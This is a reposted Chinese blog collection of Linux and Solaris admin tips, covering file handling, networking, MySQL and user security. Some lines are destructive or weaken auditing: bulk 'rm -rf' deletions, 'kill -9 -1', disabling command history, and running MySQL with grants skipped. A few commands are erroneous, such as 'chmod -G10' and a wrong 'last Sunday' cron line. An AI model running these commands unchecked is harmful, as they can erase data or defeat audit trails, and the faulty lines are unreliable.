0xf3sec

Linux小技巧收集[zz]

admin — Sat, 11 Jun 2011 03:02:02 +0000

前言：因为用Linux的时间越来越长，所需要做的事也越来越多，效率成了我必需突破的瓶颈。在此总结一下这段时间用过的一些好的Linux技巧。以后时常补充这样自己要用的时候就很方便了。
Author:Ajian
[文本处理]
1、查看某文件的一部分
如果你只想看文件的前 5 行，可以使用 head 命令，
如：head -5 /etc/passwd
如果你想查看文件的后 10 行，可以使用 tail 命令，
如：tail -10 /etc/passwd
查看文件中间一段，可以使用 sed 命令
如:sed –n ’5,10p’ /etc/passwd 这样你就可以只查看文件的第 5 行到第 10 行

2、将 file.txt 里的123改为 456
方法 1
sed ‘s/123/456/g’ file.txt > file.txt.new 修改的保存到其它文件
sed -i ‘s/123/456/g’ file.txt 直接修改原文件
方法 2
vi file.txt
输入命令：
:%s/123/456/g
注意：如果替换的文件有特殊符号如/就要用\来取消。
例：sed -i ‘s/\/usr\/local\/apache2\/htdocs/\/var\/www\/html/g’ /usr/local/apache2/conf/httpd.conf
如果只是下原有的行后添加就用&
例：sed -i ‘s/DirectoryIndex index.html index.html.var/& index.htm index.php /g’ /usr/local/apache2/conf/httpd.conf
3、echo 典型应用
echo “abcdefg” | perl -lne ‘{$a = reverse($_); print $a;}’ 把一个字符串翻转
echo bottle|rev 把一个字符串翻转

[文件目录管理]
1、删除几天以前的所有东西(包括目录名和目录中的文件）
1) find . -ctime +3 -exec rm -rf {} \;
2) find ./ -mtime +3 -print|xargs rm -f –r

2、在多级目录中查找某个文件的方法
1) find /dir -name filename.ext
2) du -a | grep filename.ext
3) locate filename.ext

3、删除软硬连接注意点
删除软件连接的时候一定要记得不要在删除的文件夹后加一斜杠,
rm -f filename/
会说这是一个文件夹不能删除
rm filename
会提示说是否要删除这个连接。
如果用的第一种可能会把其它文件都删除

4、删除目录中含输入关键字的文件
find /mnt/ebook/ -type f -exec grep “在此输入关键字” {} \; -print -exec rm {} \;

5、在当前目录下解压 rpm 文件
cat kernel-ntfs-2.4.20-8.i686.rpm | rpm2cpio | pax –r

6、用命令清空 Root 回收站中的文件
cd /var/.Trash-root
rm -rf *

[系统与安全]
1、让用户的密码必须有一定的长度，并且符合复杂度
vi /etc/login.defs，修改 PASS_MIN_LEN

2、用 dat 查询昨天的日期
date –date=’yesterday’

3、修改系统时
1) 设置你的时区： timeconfig 里选择Asia/Shanghai （如果你位于 GMT+8 中国区域）
2) 与标准时间服务器校准： ntpdate time.nist.gov
date -s “2003-04-14 cst”，cst 指时区，时间设定用 date -s 18:10
修改后执行 clock -w 写到 CMOS
3) 将当前软件系统时间写入硬件时钟： hwclock –systohc

4、改变 redhat 的系统语言/字符集
修改 /etc/sysconfig/i18n 文件，如
LANG=”en_US”，xwindow会显示英文界面，
LANG=”zh_CN.GB18030″，xwindow会显示中文界面。
还有一种方法
cp /etc/sysconfig/i18n $HOME/.i18n
vi $HOME/.i18n 文件，如
LANG=”en_US”，xwindow会显示英文界面，
LANG=”zh_CN.GB18030″，xwindow会显示中文界面。
这样就可以改变个人的界面语言，而不影响别的用户

5、查看系统信息
cat /proc/cpuinfo – CPU (i.e. vendor, Mhz, flags like mmx)
cat /proc/interrupts – 中断
cat /proc/ioports – 设备 IO端口
cat /proc/meminfo – 内存信息(i.e. mem used, free, swap size)
cat /proc/partitions – 所有设备的所有分区
cat /proc/pci – PCI设备的信息
cat /proc/swaps – 所有 Swap 分区的信息
cat /proc/version – Linux 的版本号相当于 uname -r
uname -a – 看系统内核等信息

6、让 linux自动同步时间
vi /etc/crontab
加上一句：
00 0 1 * * root rdate -s time.nist.gov

7、如何防止某个关键文件被修改
在 Linux 下，有些配置文件是不允许任何人（包括 root）修改的。为了防止被误删除或修改
可以设定该文件的“不可修改位(immutable) ”。命令如下：
# chattr +i /etc/fstab
如果需要修改文件则采用下面的命令：
# chattr -i /etc/fstab
[管理与网络]
1、 lsof 用法小全
lsof abc.txt 显示开启文件 abc.txt 的进程
lsof -i :22 知道 22 端口现在运行什么程序
lsof -c nsd 显示 nsd 进程现在打开的文件
lsof -g gid 显示归属 gid 的进程情况
lsof +d /usr/local/ 显示目录下被进程开启的文件
lsof +D /usr/local/ 同上，但是会搜索目录下的目录，时间较长
lsof -d 4 显示使用 fd 为4 的进程
lsof -i [i] 用以显示符合条件的进程情况
语法: lsof -i[46] [protocol][@hostname|hostaddr][:service|port]
46 –> IPv4 or IPv6
protocol –> TCP or UDP
hostname –> Internet host name
hostaddr –> IPv4 位置
service –> /etc/service中的 service name (可以不止一个)
port –> 端口号(可以不止一个)
例子: TCP:25 – TCP and port 25
@1.2.3.4 – Internet IPv4 host address 1.2.3.4
tcp@ohaha.ks.edu.tw:ftp – TCP protocol host:ohaha.ks.edu.tw service name:ftp
lsof -n 不将 IP转换为 hostname，预设是不加上-n参数
例子: lsof -i tcp@ohaha.ks.edu.tw:ftp -n
lsof -p 12 看进程号为 12的进程打开了哪些文件

2、grep 不显示本身进程
#ps -aux|grep httpd|grep -v grep
grep -v grep可以取消显示你所执行的 grep 本身这个进程，-v 参数是不显示所列出的进程名

3、查看本机IP
ifconfig |grep “inet” |cut -c 0-36|sed -e ‘s/[a-zA-Z: ]//g’
hostname –i

4、查看有多少活动的Httpd进程
#!/bin/sh
while (true)
do
pstree |grep “*\[httpd\]$”|sed ‘s/.*-$[0-9][0-9]*$\*\[httpd\]$/\1/’
sleep 3
done
同样可以引用到其它的进程

5、设置 com1口，让超级终端通过 com1口进行登录
第一步：确认有/sbin/agetty，编辑/etc/inittab，添加
7:2345:respawn:/sbin/agetty /dev/ttyS0 9600
9600bps 是因为连路由器时缺省一般都是这种速率，也可以设成
19200、38400、57600、115200
第二步：修改/etc/securetty，添加一行：ttyS0，确保 root 用户能登录
第三步：重启机器，就可以拔掉鼠标键盘显示器（启动时最好还是要看看输出信息）了

6、查找或删除正在使用某文件的进程
fuser filename
fuser -k filename

7、已知网络中一个机器的硬件地址，如何知道它所对应的 IP地址
在 Linux 下，假定要查“00:0A:EB:27:17:B9”这样一个硬件地址所对应的 IP 地址，可以使
用以下命令：
# cat /proc/net/arp |grep 00:0A:EB:27:17:B9
192.168.2.54 0×1 0×6 00:0A:EB:27:17:B9 *eth2
另外，还可以用“arp -a”命令查询：
# arp –a|grep 00:0A:EB:27:17:B9
（192.168.2.54）at 00:0A:EB:27:17:B9[ether] on eth2

8、在 Linux下如何绑定 IP地址和硬件地址
可以编辑一个地址对应文件，里面记录了 IP地址和硬件地址的对应关系，然后执行“arp –
f 地址对应文件”。如果没有指定地址对应文件，则通常情况下一默认文件/etc/ethers为准。
地址对应文件的格式如下：
192.168.0.1 00:0D:61:27:58:93
192.168.0.2 00:40:F4:2A:2E:5C
192.168.0.3 00:0A:EB:5E:BA:8E

9、更改 eth0是否混杂模式（混杂模式可以监听其它主机的信息）
网卡 eth0 改成混杂模式：
ifconfig eth0 promisc
关闭混杂模式：
ifconfig eth0 –promisc

10、linux下清空 arp表的命令
#arp -d -a(适用于 bsd)
for HOST in `arp | sed ‘/Address/d’ | awk ‘{ print $1}’` ; do arp -d $HOST; done

11、如何得到网卡的 MAC地址
arp -a | awk ‘{print $4}’
ifconfig eth0 | head -1 | awk ‘{print $5}’

12、一个网卡绑定多 ip
方法一、建立eth0:1在网卡后加冒号和数字的文件
cp /etc/sysconfig/network-scripts/eth0 /etc/sysconfig/network-scripts/eth0:1
再修改下eth0:1就可以了.
方法二、
在/etc/sysconfig/network-scripts/下创建一个文件：ifcfg-ethX-rangeX （”X”为网卡号）
文件内容：
IPADDR_START=
IPADDR_END=
CLONENUM=0
可以有 256个 ip

13、一个 ip如何绑定两块网卡
假设 192.168.0.88 是ip,192.168.0.1 是网关:
/sbin/modprobe bonding miimon=100 mode=1
/sbin/ifdown eth0
/sbin/ifdown eth1
/sbin/ifconfig bond0 192.168.0.88
/sbin/ifenslave bond0 eth0 eth1
/sbin/route add default gw 192.168.0.1

14、设置ssh 上来能不自动断线
修改自己 HOME 目录下的.bash_profile文件，加上
export TMOUT=1000000 (以秒为单位)
然后运行 source .bash_profile

15、mount 局域网上其他windows机器共享出的目录
mount -t smbfs -o username=guest,password=guest //machine/path /mnt/cdrom

16、向登陆到同一台服务器上的所有用户发一条信息
1)输入 wall并回车
2)输入要发送的消息
3)结束时按“Control-d”键,消息即在用户的控制窗口中显示

17、向远程机器上的所有用户发送消息
使用 rwall(向所有人远程写)命令同时发送消息到网络中的所有用户。
rwall hostname file
当使用 CDE或 OpenWindows 等窗口系统时,每个窗口被看成是一次单个的登录;
如果用户登录次数超过一次则消息直接发送到控制窗口

18、向网络中的所有用户发送消息
发送消息到网络中的所有用户
1)输入 rwall -n netgroup 并回车
2)输入要发送的消息
3)结束时按“Control-d”键，消息即在系统每个用户的控制窗口中显示，下面是系统管理员
发消息到网络组 Eng 每个用户的例子：
% rwall -n EngSystem will be rebooted at 11:00.(Control-d)
%
用户控制窗口中的消息:Broadcast message from root on console…System will be rebooted at
11:00.EOF
注意：也可以通过 rwall hostname（主机名）命令到系统的所有用户

19、将 top的结果输出到文件中
top -d 2 -n 3 -b >test.txt
可以把 top 的结果每隔 2秒，打印 3次，这样后面页的进程也能够看见了

20、装双系统不能看到另一个系统的解决办法
首先光盘启动，进入 rescue 模式，运行 GRUB，进入 grub 提示符 grub>，然后敲入下面的
语句，重启就好了。
root (hd0,2)，setup (hd0)

21、压缩传输文件或目录
传输到远程：tar czf – www | ssh server “tar zxf -”
压缩到远程：tar czf – www | ssh server “cat > www.tar.gz”
解压到远程：ssh server “tar zxf -” < www.tar.gz
解压到本地：ssh server "cat www.tar.gz" | tar zxf -

22、命令行下发送带附件的邮件
方法 1. uuencode | mail -s “title” mail@address
本地需要作为附件的文件名。
邮件中的附件文件名，可以和不同，其实内容一样。
方法 2. cat | mutt -s “title” -a mail@address
邮件正文内容。
本地需要作为附件的文件名。
[Mysql维护]
1、mysql 的数据库存放在什么地方
1) 如果使用 rpm包安装，应该在/var/lib/mysql 目录下，以数据库名为目录名
2) 如果源码安装在/usr/local/mysql中，应该在/usr/local/mysql/var中，以数据库名为目录名
2、从 mysql 中导出和导入数据
导出数据库
mysqldump 数据库名 > 文件名
导入数据库
mysqladmin create 数据库名
mysql 数据库名 < 文件名

3、忘了 mysql 的 root 口令怎么办
# service mysql stop
# mysqld_safe --skip-grant-tables &
# mysqladmin -u user password 'newpassword''
# mysqladmin flush-privileges

4、 mysqld 起来了，却无法登录，提示"/var/lib/mysql/mysql.sock"不存在
这种情况大多数是因为你的 mysql 是使用 rpm 方式安装的，它会自动寻找
/var/lib/mysql/mysql.sock 这个文件，
通过 unix socket 登录 mysql。
常见解决办法如下：
1)创建/修改文件 /etc/my.cnf，至少增加/修改一行
[mysql]
[client]
socket = /tmp/mysql.sock
#在这里写上你的 mysql.sock 的正确位置，通常不是在 /tmp/ 下就是在 /var/lib/mysql/ 下
2)指定 IP地址，使用 tcp 方式连接mysql，而不使用本地 sock 方式
#mysql -h127.0.0.1 -uuser -ppassword
3)为 mysql.sock 加个连接，比如说实际的 mysql.sock 在 /tmp/ 下，则
# ln -s /tmp/mysql.sock /var/lib/mysql/mysql.sock即可

5、导出数据的几种常用方法
1)使用 mysqldump
#mysqldump -uuser -ppassword -B database --tables table1 --tables table2 >
dump_data_20051206.sql
详细的参数
2)backup to语法
mysql>BACKUP TABLE tbl_name[,tbl_name...] TO ‘/path/to/backup/directory’;
详细请查看 mysql 手册
3)mysqlhotcopy
#mysqlhotcopy db_name [/path/to/new_directory]
或
#mysqlhotcopy db_name_1 … db_name_n /path/to/new_directory
或
#mysqlhotcopy db_name./regex/
详细请查看 mysql 手册
4)select into outfile
详细请查看 mysql 手册
5)客户端命令行
#mysql -uuser -ppassword -e “sql statements” database > result.txt
以上各种方法中，以 mysqldump 最常用

6、如何在命令行上执行 sql 语句
#mysql -uuser -ppassword -e “sql statements” database

7、导入备份出来文件的常见方法
1)由 mysqldump 出来的文件
#mysql -uuser -ppassword [database] < dump.sql
2)文件类型同上，使用 source 语法
mysql>source /path_to_file/dump.sql;
3)按照一定格式存储的文本文件或 csv 等文件
#mysqlimport [options] database file1 [file2....]
详细请查看 mysql 手册
4)文件类型同上，也可以使用 load data 语法导入
详细请查看 mysql 手册
一、Solaris修改主机名

1．编辑/etc/hosts

2．编辑/etc/hostname.网卡名

3．编辑/etc/nodename

4．编辑/etc/net/ticots/hosts

5．编辑/etc/net/ticosord/hosts

6．编辑/etc/net/ticlts/hosts

二、网卡配置方法

1．查看网卡是否已经安装

# ls /dev |grep “网卡名”

2．配置网卡接口名称

# vi /etc/hostname.网卡名

Myethernet

3．配置子网掩码

# vi /etc/inet/netmasks

192.168.0.0 255.255.255.0

4．配置网卡接口地址

# vi /etc/inet/hosts

127.0.0.1 localhost

192.168.0.100 Myethernet

5．统一配置文件

# vi /etc/inet/ipnodes

：：localhost

127.0.0.1 localhost

192.168.0.105 Myethernet loghost

三、修改主机名

1．编辑/etc/hosts

2．编辑/etc/hostname.bge0

3．编辑/etc/nodename

4．编辑/etc/net/ticots/hosts

5．编辑/etc/net/ticotsord/hosts

6．编辑/etc/net/ticlts/hosts

四、建立、取消网卡逻辑IP

1．建立

# ifconfig e1000g0:1 plumb up

# ifconfig e1000g0:1 10.0.0.1 netmask 255.255.255.0 up

2．取消

# ifconfig e10000:1 unplumb

3．永久性生效，需要修改/etc/hosts、/etc/hostname.e1000g0:1、/etc/inet/ipnodes 文件。

五、SOLARIS运行级别

0 进入OK状态（需要SUN的PROM芯片支持）

1 管理状态（单用户模式，禁止其他用户登陆）

2 多用户模式（没有网络文件共享服务）

3 多用户模式（有网络文件共享服务）

4 保留，未使用

5 退出操作系统并关机

6 重启

S,s 单用户模式

六、磁盘命名

逻辑设备：在/dev/目录下的设备名

物理设备：在/device/目录下的设备名

说明：逻辑设备通常容易被我们区分，而物理设备由KERNEL直接去识别，所以比较难理解。一般我们去记某一设备的逻辑设备名就可以了。

Sun使用下列命名方式定义逻辑设备名

/dev/[r]dsk/cXtXdXsX

c：逻辑控制器号

t：物理总线目标号

d：磁盘式逻辑单元号（LUN SCSI设备为0）

s：分区号

七、文字模式与WINDOWS模式的开关命令

# /usr/dt/bin/dtconfig –[de]

-d disable

-e enable

八、显示完全程序名的ps命令

/usr/ucb/ps –auxwww

相当于linux下ps –ef –cols

九、Solaris – ping命令查看主机IP地址

ping命令加上-a或-s即可查看主机IP地址:
#ping -a hostname
or
#ping -s hostname

十、ls命令的几个技巧

按时修改间(modification time)排序：ls -t, ls -lt, ls -1t, ls -Ct

按访问时间(access time)排序：ls -u

按文件大小排序：ls -lS

显示所有文件，除了.及..：ls -A

十一、删除“－”开头的文件

对于文件名中含－的文件，rm命令容易认为这是命令选项，用rm *报：

rm: ERROR: Illegal option — c

usage: rm [-fiRr] file…

删除的方法：

1 rm ./－filename 这样使－不是第一个字符。

2.rm — －filename 用－－告诉rm这是最后一个选项，参见getopt。有的系统用

rm －－filename

3.ls -i 列出inum ；用find . -inum inum_of_thisfile -exec rm ‘{}’ \;

用这种方法可以删除含特殊字符的文件。

十二、>重定向

1.你也可以输出重定向到一个设备里，因为linux把所有设备都看成文件

比如，当多用户登录是，A用户使用的是pts/0终端

你可以用这种方式和他聊天

echo “ｈｉ＂　＞　／ｄｅｖ／ｐｔｓ／０

不过这种方法很流氓，而且需要你对这个设备有写权

2.新建文件

>aaa 新建文件aaa

>-aaa 新建文件-aaa

3.清空文件

>aaa

linux技巧

++实现RedHat非正常关机的自动磁盘修复
先登录到服务器，然后在/etc/sysconfig里增加一个文件autofsck,内容如下：
AUTOFSCK_DEF_CHECK=yes
PROMPT=yes

++改变文件或目录之最后修改时间(变为当前时间)
执行格式：touch name ( name 可为文件或目录名称。)

++如何设置login后欢迎信息
修改/etc/motd，往里面写入文本即可。

++如何设置login前欢迎界面
修改/etc/issue或者issue.net，往里面写入文本。
issue的内容是出现在本机登录的用户界面上，而issue.net则是在用户通过网络telnet的时候出现。

++如何修改网卡MAC地址
首先必须关闭网卡设备，否则会报告系统忙，无法更改。
命令是： /sbin/ifconfig eth0 down
修改 MAC 地址，这一步较 Windows 中的修改要简单。
命令是：/sbin/ifconfig eth0 hw ether 00:AA:BB:CC:DD:EE
重新启用网卡 /sbin/ifconfig eht0 up
网卡的 MAC 地址更改就完成了

++建立别名/删除别名
alias cp=’cp -i’
unalias cp

++如何知道某个命令使用了什么库文件
例如要知道ls使用了什么库文件，可以使用：
$ ldd /bin/ls

++如何使一个用户进程在用户退出系统后仍然运行
使用nohup command &，比如：nohup wget -c ftp://test.com/test.iso
#这样即使用户退出系统，wget进程仍然继续运行直到test.iso下载完成为止

++如何限制用户的最小密码长度
修改/etc/login.defs里面的PASS_MIN_LEN的值。比如限制用户最小密码长度是8：
PASS_MIN_LEN 8

++如何取消root命令历史记录以增加安全性
为了设置系统不记录每个人执行过的命令，就在/etc/profile里设置：
HISTFILESIZE=0
HISTSIZE=0
或者：
ln -s /dev/null ~/.bash_history

++如何测试硬盘性能
使用hdparm -t -T /dev/hdX就可以测试硬盘的buffer-cache reads和buffered disk reads两个数据，可以用来当作硬盘性能的参考。
同时使用hdparm -c3 /dev/hdaX还能设置硬盘以32bit传输，以加快数据传输的速度。

++如何列出一个目录占用的空间
du或du -s或du -k
du -S | sort -n 可以迅速发现那个目录是最大的。
用df可以看到已安装的文件系统的空间大小及剩余空间大小。
quota -v查看用户的磁盘空间信息,如果你用quota限制了用户空间大小的话。

++如何使新用户首次登陆后强制修改密码
#useradd -p ‘’ testuser; chage -d 0 testuser

++在Linux中有时开机不自动检查新硬件，新安装的网卡找不到。请问怎么解决？
答：自动检查新硬件的服务是Kudzu，用户可以用“ntsysv”命令启动该服务。下次重启就会找到用户的新网卡。

++从台湾省的一个网站找到的,如何让系统密码和samba密码一致,并可以让用户自行修改他们的密码.
使用web界面來同步更改system passwd 及 samba password
下载 http://changepassword.sourceforge.net/
安装就可以了.先看README哈.
附加:
将系统用户批量倒成samba用户.
less /etc/passwd | mksmbpasswd.sh >; /etc/samba/smbpasswd

++更改Linux启动时用图形界面还是字符界面
cd /etc
vi inittab
将id:5:initdefault: 其中5表示默认图形界面
改id:3: initdefault: 3表示字符界面

++配置smb可以被哪些IP所用.
cd /etc/samba
Vi smb.conf
找到hosts allow = 192.168.1. 192.168.2. 127.
修改其为哪些机器所用,注意IP之间用逗号分开
举例:
hosts allow =192.168.1.110,192.168.1.120

++禁止在后台使用CTRL-ALT-DELETE重起机器
cd /etc/inittab
vi inittab 在文件找到下面一行
# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now （注释掉这一行）
如： # Trap CTRL-ALT-DELETE
#ca::ctrlaltdel:/sbin/shutdown -t3 -r now

++修改主机名
vi /etc/sysconfig/network
修改HOSTNAME一行为HOSTNAME=主机名

++查看开机检测的硬件
dmesg | more

++查看硬盘使用情况
df –m

++查看目录的大小
du –sh dirname

++解压小全
tar xvfj lichuanhua.tar.bz2
tar xvfz lichuanhua.tar.gz
tar xvfz lichuanhua.tgz
tar xvf lichuanhua.tar
unzip lichuanhua.zip
注:压缩 tar cvfz FileName.tar.gz DirName

++显示内存使用情况
free –m

++显示系统运行了多长时间
uptime

++显示开机自检的内容命令
dmesg

++端口的详细列表
/etc/services

++查看物理信息
lspci

++文本截面的中文支持
RH 9.0自带安装包 zhcon_0.2.3_1.rh9.i386.rpm
安装完成后，执行: zhcon 就可以支持中文了

++linux 控制 windows
(1)用RH9.0自己带rdesktop,版本是1.2.0
命令：rdesktop –u user –f 192.168.1.70 色默认的是8位
(2)要达到16色，就要下载新版本1.3.0
rdesktop –a 16 –u lichuanhua –g 800*600 192.168.1.70

++不让显示器休眠
setterm –blank 0

++显示最后一个登录到系统的用户
last

++查看所有帐号的最后登录时间
lastlog /var/log/lastlog

++查看系统自开通以来所有用户的登录时间和地点
cat /var/log/secure

++显示当前用户所属信息
id

++如何知道Apache的连接数目
ps -ef|grep httpd|wc -l #其它服务可以类推
netstat -nat|grep -i “80″|wc -l # 以上结果再减1吧

++删除用户帐号的同时,把用户的主目录也一起删除
userdel -r 用户名

++修改已有用户的信息
usermod [参数] 用户名
参数: -c, -d, -m, -g, -G, -s, -u以及-o与adduser参数意义相同
新参数: -l 新用户名(指定一个新的账号,即将原来的用户名改为新的用户名)

++改变redhat的系统语言/字符集
改 /etc/sysconfig/i18n 文件，如
LANG=”en_US”，xwindow会显示英文界面，
LANG=”zh_CN.GB18030″，xwindow会显示中文界面。
还有一种方法
cp /etc/sysconfig/i18n $HOME/.i18n
修改 $HOME/.i18n 文件，如
LANG=”en_US”，xwindow会显示英文界面，
LANG=”zh_CN.GB18030″，xwindow会显示中文界面。
这样就可以改变个人的界面语言，而不影响别的用户
vi .bashrc
export LANG=zh_CN.GB2312
export LC_ALL=zh_CN.GB2312

++cd光盘做成iso文件
cp /dev/cdrom xxxx.iso

++快速观看开机的硬件检测
dmesg | more

++查看硬盘的使用情况
df -k 以K为单位显示
df -h 以人性化单位显示，可以是b,k,m,g,t..

++查看目录的大小
du -sh dirname
-s 仅显示总计
-h 以K、M、G为单位，提高信息的可读性。KB、MB、GB是以1024为换算单位， -H以1000为换算单位。

++查找或删除正在使用某文件的进程
fuser filename
fuser -k filename

++linux中让用户的密码必须有一定的长度,并且符合复杂度
vi /etc/login.defs，改PASS_MIN_LEN

++以不同的用户身份运行程序
su – username -c “/path/to/command”
有时候需要运行特殊身份的程序, 就可以让su来做

++ adduser m -g cvsroot -s /bin/false
添加用户m，参数-s /bin/false表示不允许用户直接登录服务器
id m
显示m用户的uid和gid号。

++ 强制卸载rpm包
rpm -e –nodeps 包名称
#个别不正常情况下:
rm -f /var/lib/rpm/__*
rpm –rebuilddb

++拒绝除root用户的其它用户登陆
touch /etc/nologin
也可以在/etc/passwd中加!对指定用户限制登陆

++检查自己所属之群组名称
执行格式：groups

++修改文件/文件夹所属用户组(支持-R)
chown .组名文件名(注:组名名勿忘”.”，“:”也可)
也可chgrp 组名文件名
chown 用户名.组名文件名(同时修改所属用户及用户组)

++用fuser命令查看一下是哪些进程使用这个分区上的文件：
fuser –v –m /usr
如果没有什么重要的进程，用以下命令停掉它们：
fuser -k –v –m /usr
然后就可以重新挂载这些文件系统了。

++网络唤醒主机
ether-wake 目标网卡MAC

++如何查找大小为500K到1000K之间的文件
find / -type f -size +500k -and -size -1000k

++让主机不响应ping
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
若想恢复就用
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
#必须是用命令改，不能是vi修改

++自动注销ROOT
编辑你的配置文件”vi /etc/profile”,在”HISTSIZE=”后面加入下面这行：
TMOUT=300
#300，表示300秒

++ls只列出目录
ls -lF | grep ^d
ls -lF | grep /$
ls -F | grep /$

++让cron任务不回馈信息
* * * * * cmd > /dev/null 2>&1

++lsof(list open files)用法
lsof -i x
lsof abc.txt 显示开启文件abc.txt的进程
lsof -i :22 知道22端口现在运行什么程序
lsof -c nsd 显示nsd进程现在打开的文件
lsof -g gid 显示归属gid的进程情况

++改变sshd 的端口
在/etc/ssh/sshd_config 中加入一行：Port 2222，/etc/init.d/sshd restart 重启守护进程

++防止任何人使用su 命令成为root
vi /etc/pam.d/su，在开头添加下面两行：
auth sufficient /lib/security/pam_rootok.so
auth required /lib/security/Pam_wheel.so group=wheel
然后把用户添加到“wheel”组：chmod -G10 username

++如何让ssh 只允许指定的用户登录
方法1：在/etc/pam.d/sshd 文件中加入
auth required pam_listfile.so item=user sense=allow file=/etc/sshusers onerr=fail
然后在/etc 下建立sshusers 文件,加入允许使用ssh 服务的用户名(每一个用户名都要单独一行),重新起动sshd

++利用ssh 复制文件
1、从A 复制B（推过去） #scp -rp /path/filename username@remoteIP:/path
2、从B 复制到A（拉过来）#scp -rp username@remoteIP:/path/filename /path

++linux机器挂载windows上的共享文件
windows IP:192.168.1.1
mount -t smbfs -o username=massky,password=massky //192.168.1.1/dbf /mnt/share
如想机器重启自动挂载，vi /etc/fstab最后加入：
//192.168.1.1/dbf /mnt/share smbfs defaults,auto,username=massky,password=massky 0 0

++定制linux 提示符
在bash 中提示符是通过一个环境变量$PS1 指定的。用export $PS1 查看现在的值，比较直
观常用的提示符可以设定为export PS1=“[\u@\h \W]\$”。其中\u 代表用户名，\h 代表主机
名，\W 代表当前工作目录的最后一层，如果是普通用户\$则显示$，root 用户显示#。

++清空文件
[echo] > 文件名

++DNS相关
host -a domain.com #显示相关资讯都列出来
host domain.com 202.106.0.20 #用202.106.0.20这台DNS服务器查询domain.com

++前后台任务相关
jobs 列出属于当前用户的进程
bg 将进程搬到后台运行（Background）
fg 将进程搬到前台运行（Foreground）
万一你运行程序时忘记使用“&”了，又不想重新执行。可以先使用ctrl+z挂起程序，然后敲入bg命令，这样程序就在后台继续运行了。

++查找当前目录下七天前的文件,并删除
find ./ -mtime +7 -type f -exec rm {} \;

++产生指定大小的文件(bs*count)
dd if=/dev/zero of=filename bs=1000000 count=10

++查找当前目录下文件并更改扩展名
更改所有.ss文件为.aa
# find ./ -name “*.ss” -exec rename .ss .aa ‘{}’ \;

++修改系统时间
date -s “2005-6-4 17:26″

++让服务器自动同步时间
0 1 * * * /usr/sbin/ntpdate 210.72.145.44
或 0 1 * * * rdate -s time.nist.gov

++解决打开文件过多的问题
在etc/security/limits.conf 配置文件中设置进程文件描述符极限：
* soft nofile 2048
* hard nofile 4096
系统级文件描述符极限及timeout时间修改，添加如下两行到 /etc/rc.d/rc.local 启动脚本中：
# Increase system-wide file descriptor limit.
echo 65536 > /proc/sys/fs/file-max
echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout
#一般情况下，最大打开文件数比较合理的设置为每4M物理内存256，比如1G内存可以设为65536，
#而最大的使用的i节点的数目应该是最大打开文件数目的3倍到4倍

++如何用tar打包一个目录时,去掉其中的某些子目录或指定文件
加参数 –exclude 即可, 可加文件名或目录名, 可多写
tar cvf –exclude {dirname,filename} #dirname不要加/

++终端下修改服务器时区
/usr/sbin/timeconfig
或直接#/etc/sysconfig/clock

++关闭启动时的内存不足256M提示
#vi /etc/rc.sysinit #把最后六行注释掉
或#vi /var/lib/supportinfo
把其中的 MinRAM: 256M 这个值调低点.

++在多层目录中查找到某一指定”字符串”
grep string -R /etc/sysconfig/
find ./pathname/ -name ‘*’ | xargs grep ‘string’

++占用CPU的一个命令
#yes string #有时候测试用得上。狂占CPU

++Kill相关
kill -STOP [pid]
　发送SIGSTOP (17,19,23)停止一个进程，而并不消灭这个进程。
kill -CONT [pid]
发送SIGCONT (19,18,25)重新开始一个停止的进程。
kill -KILL [pid]
发送SIGKILL (9)强迫进程立即停止，并且不实施清理操作。
kill -9 -1
终止你拥有的全部进程。

++在当前目录下建个bak目录,然后 cp * bak,会提示略过bak,有其它办法可以排除指定文件(夹)?
ls -F|grep -v \/|xargs -i cp {} bak #推荐
或 find ! -name “./bak”

++ 根据进程名显示进程号
# pidof httpd
1846 1845 1844 1843 1842 1841 1840 1839 1820

++e2fsck
检查使用 Linux ext2 档案系统的 partition 是否正常工作, 检查 /dev/hda5 是否正常，如果有异常便自动修复，并且设定若有问答，均回答[是] :
e2fsck -a -y /dev/hda5

++反向输出
rev 反向输出(以行为单位)
tac 反向输出(全文)

++显示终端号
tty

++文件行数/字数统计
wc –l file 计算文件行数
wc -w file 计算文件中的单词数
wc -c file 计算文件中的字符数

++出每行第5个到第9个字符
cut -b5-9 file.txt

++删除文本文件中出现的行列
uniq

++返回文件所在路径
dirname /bin/tux #将返回 /bin

++fcitx在英文环境下正常使用
#vi ~/.bashrc
xport LC_CTYPE=”zh_CN.UTF-8″
export XMODIFIERS=”@im=fcitx”
export XIM=fcitx
export XIM_PROGRAM=fcitx
#gnome-session-properties可以把fctix加入登入后自启动

++split分割合并文件
split -b1440k a_whopping_big_file chunk #拆
cat chunk* > a_whopping_big_file #合

删除 core 文件

# find ~ -name core -exec file {} ; -exec rm -i {} ;

查看使用文件的进程

# fuser -u /usr/my_application/foo

搜索字符串

#grep “hello world” `find ./ -name “*” -print -exec file {} ; |grep text | cut -d ‘:’ -f 1`

#alias dir=’ls -Lla|grep ^d’

输出 IP 地址

#ifconfig | grep “inet addr” | grep -v “127.0.0.1″ | awk ‘{print $2;}’ | awk -F’:’ ‘{print $2;}’

按文件长度排序

#ls -l | grep ^- | sort -nr -k 5 | more

#ls -lR | grep ^- | sort -nr -k 5 | more

二进制文件中的可打印字符

# strings name of binary file

一个月的最后一个星期天执行任务：

18 * * * 0 [`date "+%d"` -gt 24] && /path/to/script

修改扩展名：

# for f in *.abc; do mv $f `basename $f .abc`.def ; done

查看硬盘情况：(Solaris)

# iostat -En

整个目录树拷贝：

# cd

# find . -depth -print | cpio -pudm

按长度排序目录下所有文件

# du -a | sort -n -r | more

检查文件内每行是否有相同列数

#awk ‘{print NF}’ test.txt |sort -nu|more

去除空行

#sed -e ‘/^[ ]*$/d’ InputFile >OutputFile

查看进程占用的对应文件 inode 号(Solaris)

#/usr/proc/bin/pfiles

删除指定用户的所有进程

# kill -9 `ps -fu username |awk ‘{ print $2 }’|grep -v PID`

Bash 操作快捷键：

ctrl-l — clear screen

ctrl-r — does a search in the previously given commands so that you don’t

have to repeat long command.

ctrl-u — clears the typing before the hotkey.

ctrl-a — takes you to the begining of the command you are currently typing.

ctrl-e — takes you to the end of the command you are currently typing in.

esc-b — takes you back by one word while typing a command.

ctrl-c — kills the current command or process.

ctrl-d — kills the shell.

ctrl-h — deletes one letter at a time from the command you are typing in.

ctrl-z — puts the currently running process in background, the process

can be brought back to run state by using fg command.

esc-p — like ctrl-r lets you search through the previously given commands.

esc-. — gives the last command you typed.

文件名里的空格替换为下划线

